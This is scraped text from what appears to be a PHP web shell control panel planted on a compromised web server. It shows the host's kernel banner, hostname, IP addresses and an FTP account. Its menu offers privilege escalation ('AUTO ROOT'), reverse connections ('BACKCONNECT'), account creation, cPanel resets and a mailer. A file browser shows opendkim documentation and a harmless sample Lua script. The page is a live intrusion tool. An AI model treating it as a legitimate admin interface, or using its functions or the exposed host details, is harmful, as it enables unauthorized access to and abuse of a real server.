Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
opendkim /
[ HOME SHELL ]
Name
Size
Permission
Action
FEATURES
4.02
KB
-rw-r--r--
KNOWNBUGS
1.01
KB
-rw-r--r--
README
33.17
KB
-rw-r--r--
README.fedora
3.73
KB
-rw-r--r--
RELEASE_NOTES
78.8
KB
-rw-r--r--
RELEASE_NOTES.Sendmail
58.96
KB
-rw-r--r--
authheaders-check-setup-hook.l...
2.45
KB
-rw-r--r--
convert_keylist.sh
1.99
KB
-rw-r--r--
final.lua.sample
2.04
KB
-rw-r--r--
opendkim.conf.sample
21.49
KB
-rw-r--r--
opendkim.conf.simple
714
B
-rw-r--r--
opendkim.conf.simple-verify
435
B
-rw-r--r--
screen.lua.sample
984
B
-rw-r--r--
setup.lua.sample
2.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : screen.lua.sample
-- -- Copyright (c) 2009, 2010, 2012, The Trusted Domain Project. -- All rights reserved. -- -- screen.lua.sample -- sample version of the "screen" script that demonstrates -- all of the features of the configuration file -- -- The screen script is executed after all header fields have been received -- and after signatures have been selected, but before the message body -- is handled. Here we have an opportunity to identify and ignore signatures -- we know we don't trust. -- retrieve the count of signatures on the message nsigs = odkim.get_sigcount(ctx) if nsigs == nil then return nil end -- get the From: domain fdomain = odkim.get_fromdomain(ctx) if fdomain == nil then return nil end -- for each signature, ignore it if it's not from the sender's domain for n = 1, nsigs do sig = odkim.get_signhandle(ctx, n) sdomain = odkim.sig_getdomain(sig) if fdomain ~= sdomain then odkim.sig_ignore(sig) end end -- That's it! return nil
Close